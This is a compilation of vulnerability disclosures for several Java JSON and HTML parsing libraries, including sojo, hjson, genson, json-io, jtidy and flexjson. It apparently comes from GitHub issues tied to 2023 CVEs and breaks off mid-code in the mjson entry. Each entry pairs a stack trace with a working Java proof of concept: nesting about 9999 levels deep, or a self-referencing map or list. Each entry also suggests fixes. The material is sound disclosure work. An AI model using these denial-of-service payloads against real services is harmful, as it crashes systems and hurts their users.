An issue was discovered sojo thru 1.1.1 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.

**Stack overflow error caused by sojo parsing of untrusted JSON String****Description**

Using sojo to parse untrusted JSON String may be vulnerable to denial of service (DOS) attacks. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.

**Error Log**

    Exception in thread "main" java.lang.StackOverflowError
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_scan_token(JsonParserGenerate.java:503)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3R_4(JsonParserGenerate.java:344)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3_3(JsonParserGenerate.java:374)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3R_3(JsonParserGenerate.java:351)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3_13(JsonParserGenerate.java:295)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3R_6(JsonParserGenerate.java:313)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3_6(JsonParserGenerate.java:258)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3R_3(JsonParserGenerate.java:357)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3_13(JsonParserGenerate.java:295)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_2_13(JsonParserGenerate.java:252)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.array(JsonParserGenerate.java:144)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.value(JsonParserGenerate.java:78)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.array(JsonParserGenerate.java:145)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.value(JsonParserGenerate.java:78)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.array(JsonParserGenerate.java:145)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.value(JsonParserGenerate.java:78)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.array(JsonParserGenerate.java:145)
    
    

**PoC**

        <dependency\>
            <groupId\>net.sf.sojo</groupId\>
            <artifactId\>sojo</artifactId\>
            <version\>1.1.1</version\>
        </dependency\>

import net.sf.sojo.interchange.json.JsonParser;

public class PoC {

    public final static int TOO\_DEEP\_NESTING = 9999;
    public final static String TOO\_DEEP\_DOC = \_nestedDoc(TOO\_DEEP\_NESTING, "\[ ", "\] ", "0");


    public static String \_nestedDoc(int nesting, String open, String close, String content) {
        StringBuilder sb = new StringBuilder(nesting \* (open.length() + close.length()));
        for (int i = 0; i < nesting; ++i) {
            sb.append(open);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        sb.append("\\n").append(content).append("\\n");
        for (int i = 0; i < nesting; ++i) {
            sb.append(close);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        return sb.toString();
    }

    public static void main(String\[\] args) {
        String jsonString = TOO\_DEEP\_DOC;
        JsonParser parser = new JsonParser();
        parser.parse(jsonString);
    }
}

**Rectification Solution**

1.  Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)
    
2.  Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.(（google/gson@2d01d6a20f39881c692977564c1ea591d9f39027）)

CVE-2023-34613: Stack overflow error caused by sojo parsing of untrusted JSON String · Issue #15 · maddingo/sojo

An issue was discovered jjson thru 0.1.7 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

**Comments**

**Stack overflow error caused by jjson serialization Map****Description**

jjson before v0.1.7 was discovered to contain a stack overflow via the map parameter. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted string.

**Error Log**

    Exception in thread "main" java.lang.StackOverflowError
    	at de.grobmeier.jjson.shaded.org.apache.commons.lang3.text.translate.AggregateTranslator.translate(AggregateTranslator.java:52)
    	at de.grobmeier.jjson.shaded.org.apache.commons.lang3.text.translate.AggregateTranslator.translate(AggregateTranslator.java:52)
    	at de.grobmeier.jjson.shaded.org.apache.commons.lang3.text.translate.CharSequenceTranslator.translate(CharSequenceTranslator.java:87)
    	at de.grobmeier.jjson.shaded.org.apache.commons.lang3.text.translate.CharSequenceTranslator.translate(CharSequenceTranslator.java:61)
    	at de.grobmeier.jjson.shaded.org.apache.commons.lang3.StringEscapeUtils.escapeJava(StringEscapeUtils.java:456)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeString(JSONAnnotationEncoder.java:286)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:149)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
    
    

**PoC**

        <dependency\>
            <groupId\>de.grobmeier.json</groupId\>
            <artifactId\>jjson</artifactId\>
            <version\>0.1.7</version\>
        </dependency\>

import de.grobmeier.jjson.JSONException;
import de.grobmeier.jjson.convert.JSONAnnotationEncoder;

import java.util.HashMap;

public class PoC2 {

    public static void main(String\[\] args) throws JSONException {
        HashMap<String,Object\> map\=new HashMap<>();
        map.put("t",map);
        JSONAnnotationEncoder jsonAnnotationEncoder = new JSONAnnotationEncoder();
        jsonAnnotationEncoder.encode(map);
    }
}

**Rectification Solution**

1.  Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)
    
2.  Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.(（google/gson@2d01d6a20f39881c692977564c1ea591d9f39027）)
    

**References**

1.  If the value in map is the map's self, the new new JSONObject(map) cause StackOverflowError which may lead to dos jettison-json/jettison#52
2.  https://github.com/jettison-json/jettison/pull/53/files

1 participant

CVE-2023-35110: Stack overflow error caused by jjson serialization Map · Issue #2 · grobmeier/jjson

An issue was discovered hjson thru 3.0.0 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.

**Stack overflow error caused by hjson parsing of untrusted JSON String****Description**

Using hjson to parse untrusted JSON String may be vulnerable to denial of service (DOS) attacks. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.

**Error Log**

    Exception in thread "main" java.lang.StackOverflowError
    	at org.hjson.HjsonParser.read(HjsonParser.java:454)
    	at org.hjson.HjsonParser.skipWhiteSpace(HjsonParser.java:411)
    	at org.hjson.HjsonParser.readObject(HjsonParser.java:185)
    	at org.hjson.HjsonParser.readValue(HjsonParser.java:119)
    	at org.hjson.HjsonParser.readObject(HjsonParser.java:199)
    	at org.hjson.HjsonParser.readValue(HjsonParser.java:119)
    	at org.hjson.HjsonParser.readObject(HjsonParser.java:199)
    	at org.hjson.HjsonParser.readValue(HjsonParser.java:119)
    	at org.hjson.HjsonParser.readObject(HjsonParser.java:199)
    	at org.hjson.HjsonParser.readValue(HjsonParser.java:119)
    	at org.hjson.HjsonParser.readObject(HjsonParser.java:199)
    	at org.hjson.HjsonParser.readValue(HjsonParser.java:119)
    	at org.hjson.HjsonParser.readObject(HjsonParser.java:199)
    	at org.hjson.HjsonParser.readValue(HjsonParser.java:119)
    	at org.hjson.HjsonParser.readObject(HjsonParser.java:199)
    	at org.hjson.HjsonParser.readValue(HjsonParser.java:119)
    	at org.hjson.HjsonParser.readObject(HjsonParser.java:199)
    
    

**PoC**

        <dependency\>
            <groupId\>org.hjson</groupId\>
            <artifactId\>hjson</artifactId\>
            <version\>3.0.0</version\>
        </dependency\>

import org.hjson.JsonValue;

public class PoC {

    public final static int TOO\_DEEP\_NESTING = 9999;
    public final static String TOO\_DEEP\_DOC = "{" + \_nestedDoc(TOO\_DEEP\_NESTING, "a : { ", "} ", "") + "}";


    public static String \_nestedDoc(int nesting, String open, String close, String content) {
        StringBuilder sb = new StringBuilder(nesting \* (open.length() + close.length()));
        for (int i = 0; i < nesting; ++i) {
            sb.append(open);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        sb.append("\\n").append(content).append("\\n");
        for (int i = 0; i < nesting; ++i) {
            sb.append(close);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        return sb.toString();
    }

    public static void main(String\[\] args) {
        String jsonString = TOO\_DEEP\_DOC;
        JsonValue.readHjson(jsonString);
    }
}

**Rectification Solution**

1.  Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)
    
2.  Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.(（google/gson@2d01d6a20f39881c692977564c1ea591d9f39027）)

CVE-2023-34620: Stack overflow error caused by hjson parsing of untrusted JSON String  (2) · Issue #24 · hjson/hjson-java

An issue was discovered genson thru 1.6 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.

**Stack overflow error caused by genson parsing of untrusted JSON String****Description**

Using genson to parse untrusted JSON String may be vulnerable to denial of service (DOS) attacks. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.

**Error Log**

    Exception in thread "main" java.lang.StackOverflowError
    	at com.owlike.genson.stream.JsonReader.begin(JsonReader.java:409)
    	at com.owlike.genson.stream.JsonReader.beginArray(JsonReader.java:149)
    	at com.owlike.genson.convert.DefaultConverters$CollectionConverter.deserialize(DefaultConverters.java:172)
    	at com.owlike.genson.convert.DefaultConverters$CollectionConverter.deserialize(DefaultConverters.java:159)
    	at com.owlike.genson.convert.NullConverterFactory$NullConverterWrapper.deserialize(NullConverterFactory.java:77)
    	at com.owlike.genson.Genson.deserialize(Genson.java:382)
    	at com.owlike.genson.convert.DefaultConverters$UntypedConverterFactory$UntypedConverter.deserialize(DefaultConverters.java:997)
    	at com.owlike.genson.convert.NullConverterFactory$NullConverterWrapper.deserialize(NullConverterFactory.java:77)
    	at com.owlike.genson.convert.DefaultConverters$CollectionConverter.deserialize(DefaultConverters.java:176)
    	at com.owlike.genson.convert.DefaultConverters$CollectionConverter.deserialize(DefaultConverters.java:159)
    	at com.owlike.genson.convert.NullConverterFactory$NullConverterWrapper.deserialize(NullConverterFactory.java:77)
    	at com.owlike.genson.Genson.deserialize(Genson.java:382)
    
    

**PoC**

        <dependency\>
            <groupId\>com.owlike</groupId\>
            <artifactId\>genson</artifactId\>
            <version\>1.6</version\>
        </dependency\>

import com.owlike.genson.Genson;

public class PoC {

    public final static int TOO\_DEEP\_NESTING = 9999;
    public final static String TOO\_DEEP\_DOC = \_nestedDoc(TOO\_DEEP\_NESTING, "\[ ", "\] ", "0");


    public static String \_nestedDoc(int nesting, String open, String close, String content) {
        StringBuilder sb = new StringBuilder(nesting \* (open.length() + close.length()));
        for (int i = 0; i < nesting; ++i) {
            sb.append(open);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        sb.append("\\n").append(content).append("\\n");
        for (int i = 0; i < nesting; ++i) {
            sb.append(close);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        return sb.toString();
    }

    public static void main(String\[\] args) {
        String jsonString = TOO\_DEEP\_DOC;
        // 创建 Genson 实例
        Genson genson = new Genson();

        // 模糊测试 JSON 解析
        Object parsedObject = genson.deserialize(jsonString, Object.class);
    }
}

**Rectification Solution**

1.  Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)
    
2.  Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.(（google/gson@2d01d6a20f39881c692977564c1ea591d9f39027）)

CVE-2023-34617: Stack overflow error caused by genson parsing of untrusted JSON String · Issue #191 · owlike/genson

An issue was discovered jmarsden/jsonij thru 0.5.2 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.

Using jsonij to parse untrusted JSON String may be vulnerable to denial of service (DOS) attacks. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.

Exception in thread "main" java.lang.StackOverflowError
    at jsonij.ArrayImp.internalType(ArrayImp.java:53)
    at jsonij.Value.<init>(Value.java:54)
    at jsonij.ArrayImp.<init>(ArrayImp.java:44)
    at jsonij.JSON$Array.<init>(JSON.java:326)
    at jsonij.parser.JSONParser.parseArray(JSONParser.java:271)
    at jsonij.parser.JSONParser.parseValue(JSONParser.java:180)
    at jsonij.parser.JSONParser.parseArray(JSONParser.java:275)
    at jsonij.parser.JSONParser.parseValue(JSONParser.java:180)
    at jsonij.parser.JSONParser.parseArray(JSONParser.java:275)
    at jsonij.parser.JSONParser.parseValue(JSONParser.java:180)
    at jsonij.parser.JSONParser.parseArray(JSONParser.java:275)

        <dependency>
            <groupId>cc.plural</groupId>
            <artifactId>jsonij</artifactId>
            <version>0.5.2</version>
        </dependency>

import jsonij.Value;
import jsonij.parser.JSONParser;
import jsonij.parser.ParserException;

public class PoC {

    public final static int TOO\_DEEP\_NESTING \= 9999;
    public final static String TOO\_DEEP\_DOC \= \_nestedDoc(TOO\_DEEP\_NESTING, "\[ ", "\] ", "0");

    public static String \_nestedDoc(int nesting, String open, String close, String content) {
        StringBuilder sb \= new StringBuilder(nesting \* (open.length() + close.length()));
        for (int i \= 0; i < nesting; ++i) {
            sb.append(open);
            if ((i & 31) \== 0) {
                sb.append("\\n");
            }
        }
        sb.append("\\n").append(content).append("\\n");
        for (int i \= 0; i < nesting; ++i) {
            sb.append(close);
            if ((i & 31) \== 0) {
                sb.append("\\n");
            }
        }
        return sb.toString();
    }

    public static void main(String\[\] args) throws ParserException {
        String jsonString \= TOO\_DEEP\_DOC;
        JSONParser jsonParser \= new JSONParser();
        Value parse \= jsonParser.parse(jsonString);
    }
}

1.  Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b))
2.  Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.(（https://github.com/google/gson/commit/2d01d6a20f39881c692977564c1ea591d9f39027）))

‌

CVE-2023-34614: Stack overflow error caused by jsonij parsing of untrusted JSON String

An issue was discovered json-io thru 4.14.0 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.

**Stack overflow error caused by json-io parsing of untrusted JSON String****Description**

Using json-io to parse untrusted JSON String may be vulnerable to denial of service (DOS) attacks. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.

**Error Log**

    Exception in thread "main" java.lang.StackOverflowError
    	at com.cedarsoftware.util.io.JsonParser.readValue(JsonParser.java:241)
    	at com.cedarsoftware.util.io.JsonParser.readArray(JsonParser.java:288)
    	at com.cedarsoftware.util.io.JsonParser.readValue(JsonParser.java:256)
    	at com.cedarsoftware.util.io.JsonParser.readArray(JsonParser.java:288)
    	at com.cedarsoftware.util.io.JsonParser.readValue(JsonParser.java:256)
    	at com.cedarsoftware.util.io.JsonParser.readArray(JsonParser.java:288)
    	at com.cedarsoftware.util.io.JsonParser.readValue(JsonParser.java:256)
    	at com.cedarsoftware.util.io.JsonParser.readArray(JsonParser.java:288)
    	at com.cedarsoftware.util.io.JsonParser.readValue(JsonParser.java:256)
    	at com.cedarsoftware.util.io.JsonParser.readArray(JsonParser.java:288)
    	at com.cedarsoftware.util.io.JsonParser.readValue(JsonParser.java:256)
    	at com.cedarsoftware.util.io.JsonParser.readArray(JsonParser.java:288)
    	at com.cedarsoftware.util.io.JsonParser.readValue(JsonParser.java:256)
    	at com.cedarsoftware.util.io.JsonParser.readArray(JsonParser.java:288)
    	at com.cedarsoftware.util.io.JsonParser.readValue(JsonParser.java:256)
    
    

**PoC**

<dependency\>
	<groupId\>com.cedarsoftware</groupId\>
	<artifactId\>json-io</artifactId\>
	<version\>4.14.0</version\>
</dependency\>

import com.cedarsoftware.util.io.JsonReader;

public class PoC {

    public final static int TOO\_DEEP\_NESTING = 9999;
    public final static String TOO\_DEEP\_DOC = \_nestedDoc(TOO\_DEEP\_NESTING, "\[ ", "\] ", "0");


    public static String \_nestedDoc(int nesting, String open, String close, String content) {
        StringBuilder sb = new StringBuilder(nesting \* (open.length() + close.length()));
        for (int i = 0; i < nesting; ++i) {
            sb.append(open);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        sb.append("\\n").append(content).append("\\n");
        for (int i = 0; i < nesting; ++i) {
            sb.append(close);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        return sb.toString();
    }

    public static void main(String\[\] args) {
        String jsonString = TOO\_DEEP\_DOC;
        JsonReader.jsonToJava(jsonString);
    }
}

**Rectification Solution**

1.  Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)
    
2.  Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.(（google/gson@2d01d6a20f39881c692977564c1ea591d9f39027）)

CVE-2023-34610: Stack overflow error caused by json-io parsing of untrusted JSON String · Issue #169 · jdereg/json-io

An issue was discovered jtidy thru r938 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.

**Stack overflow error caused by jtidy parsing of untrusted Html String****Description**

Using jtidy to parse untrusted Html String may be vulnerable to denial of service (DOS) attacks. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.

**Error Log**

    Exception in thread "main" java.lang.StackOverflowError
    	at java.base/java.nio.charset.Charset.lookup(Charset.java:457)
    	at java.base/java.nio.charset.Charset.isSupported(Charset.java:503)
    	at java.base/java.lang.StringCoding.lookupCharset(StringCoding.java:101)
    	at java.base/java.lang.StringCoding.decode(StringCoding.java:234)
    	at java.base/java.lang.String.<init>(String.java:467)
    	at org.w3c.tidy.TidyUtils.getString(TidyUtils.java:658)
    	at org.w3c.tidy.Lexer.getToken(Lexer.java:2343)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2051)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    
    

**PoC**

        <dependency\>
            <groupId\>net.sf.jtidy</groupId\>
            <artifactId\>jtidy</artifactId\>
            <version\>r938</version\>
        </dependency\>

import org.w3c.tidy.Tidy;

import java.io.StringReader;

public class PoC {
    public final static int TOO\_DEEP\_NESTING = 9999;
    public final static String TOO\_DEEP\_DOC = \_nestedDoc(TOO\_DEEP\_NESTING, "<div>", "</div>", "");


    public static String \_nestedDoc(int nesting, String open, String close, String content) {
        StringBuilder sb = new StringBuilder(nesting \* (open.length() + close.length()));
        for (int i = 0; i < nesting; ++i) {
            sb.append(open);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        sb.append("\\n").append(content).append("\\n");
        for (int i = 0; i < nesting; ++i) {
            sb.append(close);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        return sb.toString();
    }

    public static void main(String\[\] args) {
        String htmlData = TOO\_DEEP\_DOC;
        try (StringReader stringReader = new StringReader(htmlData);){
            Tidy tidy = new Tidy();
            tidy.parse(stringReader, System.out);
        } catch (Exception e) {
        }
    }
}

**Rectification Solution**

1.  Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)
    
2.  Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.(（google/gson@2d01d6a20f39881c692977564c1ea591d9f39027）)

CVE-2023-34623: Stack overflow error caused by jtidy parsing of untrusted Html String · Issue #4 · trajano/jtidy

An issue was discovered flexjson thru 3.3 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.

**Stack overflow error caused by flexjson serialization List****Description**

flexjson before v3.3 was discovered to contain a stack overflow via the List parameter. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted string.

**Error Log**

Exception in thread "main" java.lang.StackOverflowError
    at java.base/java.util.Stack.push(Stack.java:67)
    at flexjson.JSONContext.pushTypeContext(JSONContext.java:140)
    at flexjson.JSONContext.writeOpenArray(JSONContext.java:268)
    at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:24)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.JSONContext.transform(JSONContext.java:72)
    at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:28)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.JSONContext.transform(JSONContext.java:72)
    at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:28)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.JSONContext.transform(JSONContext.java:72)
    at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:28)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.JSONContext.transform(JSONContext.java:72)
    at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:28)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.JSONContext.transform(JSONContext.java:72)
    at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:28)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.JSONContext.transform(JSONContext.java:72)

**PoC**

<dependency>
<groupId>net.sf.flexjson</groupId>
<artifactId>flexjson</artifactId>
<version>3.3</version>
</dependency>

importflexjson.JSONSerializer;

importjava.util.ArrayList;

publicclass PoC3{
publicstaticvoidmain(String[]args){

ArrayList<Object>list=newArrayList<>();
list.add(list);

Strings=newJSONSerializer().deepSerialize(list);
}
}

**Rectification Solution**

1.  Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b)
    
2.  Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.(（https://github.com/google/gson/commit/2d01d6a20f39881c692977564c1ea591d9f39027）)
    

**References**

1.  https://github.com/jettison-json/jettison/issues/52
2.  https://github.com/jettison-json/jettison/pull/53/files

CVE-2023-34609: Flexjson / Bugs / #51 Stack overflow error caused by flexjson serialization List

An issue was discovered mjson thru 1.4.1 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.

**Stack overflow error caused by mjson parsing of untrusted JSON String****Description**

Using mjson to parse untrusted JSON String may be vulnerable to denial of service (DOS) attacks. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.

**Error Log**

    Exception in thread "main" java.lang.StackOverflowError
    	at java.base/java.lang.ThreadLocal.get(ThreadLocal.java:165)
    	at mjson.Json.factory(Json.java:1192)
    	at mjson.Json.array(Json.java:1291)
    	at mjson.Json$Reader.readArray(Json.java:2787)
    	at mjson.Json$Reader.read(Json.java:2715)
    	at mjson.Json$Reader.readArray(Json.java:2788)
    	at mjson.Json$Reader.read(Json.java:2715)
    	at mjson.Json$Reader.readArray(Json.java:2788)
    	at mjson.Json$Reader.read(Json.java:2715)
    	at mjson.Json$Reader.readArray(Json.java:2788)
    	at mjson.Json$Reader.read(Json.java:2715)
    	at mjson.Json$Reader.readArray(Json.java:2788)
    	at mjson.Json$Reader.read(Json.java:2715)
    	at mjson.Json$Reader.readArray(Json.java:2788)
    	at mjson.Json$Reader.read(Json.java:2715)
    	at mjson.Json$Reader.readArray(Json.java:2788)
    	at mjson.Json$Reader.read(Json.java:2715)
    	at mjson.Json$Reader.readArray(Json.java:2788)
    	at mjson.Json$Reader.read(Json.java:2715)
    	at mjson.Json$Reader.readArray(Json.java:2788)
    	at mjson.Json$Reader.read(Json.java:2715)
    	at mjson.Json$Reader.readArray(Json.java:2788)
    	at mjson.Json$Reader.read(Json.java:2715)
    	at mjson.Json$Reader.readArray(Json.java:2788)
    
    

**PoC**

        <dependency\>
            <groupId\>org.sharegov</groupId\>
            <artifactId\>mjson</artifactId\>
            <version\>1.4.1</version\>
        </dependency\>

import mjson.Json;

public class PoC {

    public final static int TOO\_DEEP\_NESTING = 9999;
    public final static String TOO\_DEEP\_DOC = \_nestedDoc(TOO\_DEEP\_NESTING, "\[ ", "\] ", "0");


    public static String \_nestedDoc(int nesting, String open, String close, String content) {
        StringBuilder sb = new StringBuilder(nesting \* (open.length() + close.length()));
        for (int i = 0; i < nesting; ++i) {
            sb.append(open);
            if ((i & 31) == 0) {
                sb.append("\\n");
